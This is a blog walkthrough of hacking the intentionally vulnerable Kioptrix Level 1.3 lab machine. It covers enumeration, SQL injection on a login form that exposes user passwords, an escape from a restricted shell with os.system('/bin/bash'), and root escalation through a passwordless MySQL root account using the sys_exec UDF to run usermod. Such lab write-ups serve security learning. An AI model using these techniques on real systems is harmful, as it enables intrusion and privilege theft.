Thursday, June 7, 2018
Kioptrix - Level 1.3 (#4)
KIOPTRIX - Level 1.3 (#4)
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is the study of the hacking process for the vulnerable machine Kioptrix Level 1.3 (#4)
- Kioptrix Level 1.3 (#4) can be downloaded from here:
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
- Once downloaded, extracted and opened with WMware:
2 - ENUMERATION
- First, using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.14, so it should correspond to the vulnerable machine Kioptrix:
- Scanning with Nmap:
- Using nbtscan:
- enum4linux discovers that there are at least 5 users: nobody, robert, root, john, loneferret.
- dirb scans the structure of the website:
- Connecting directly to the web server there is a Member Login:
- Images:
- john user's webpage:
3 - EXPLOITATION
- Let's discover if there is a chance of SQL injection:
- According to the server's answer the file /var/www/checklogin.php holds interesting information about the login process, what could be of use later:
- Entering a basic SQL injection:
- Surprisingly, the password for user john is revealed:
- Same thing for the user robert (beware of its base64 encoded appearance, it could be misleading):
- However, there is no successful result for the rest of the users, for instance for user root:
- Now, let's use the credentials for connecting via SSH with users john and robert
- It seems that the available shell is very limited:
- All information about lshell and how to bypass it:
https://www.aldeid.com/wiki/Lshell
- Trying to get a better shell with os.system('/bin/bash'):
4 - PRIVILEGE ESCALATION
- Checking what's inside the /home directory:
- It is interesting to see that there are some references to a MYSQL database:
- Trying to enter the database with root privileges, we have the gift that the administrator of the database forgot to set a password for the user root:
- Showing databases:
- We discover the same username/password information that already knew:
- From the enumeration step we know that /var/www/checklogin.php has information about the login process:
- Opening /var/www/checklogin.php there is no password for root, as expected:
- So, the conclusion is that the mysql database can be run with root privileges and no password.
- The approach to achieve Privilege Escalation will be to take advantage of the fact that the database is being run as root with no password.
- We can run a User Defined Function (UDF) to execute commands on the underlying operating system:
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
- lib_mysqludf_sys is an UDF library with functions to interact with the execution environment in which MySQL runs.
- Luckily, we already have it installed
- Otherwise it could be downloaded from here:
https://github.com/mysqludf/lib_mysqludf_sys
- One of the UDF funcions is sys_exec, what executes arbitrary commands like for instance usermod -a -G admin john , modifying the user john's account by appending it to the admin group, and giving him root privileges:
- Now, a root shell is achieved:
5 - CAPTURING THE FLAG
- Going to the /root folder: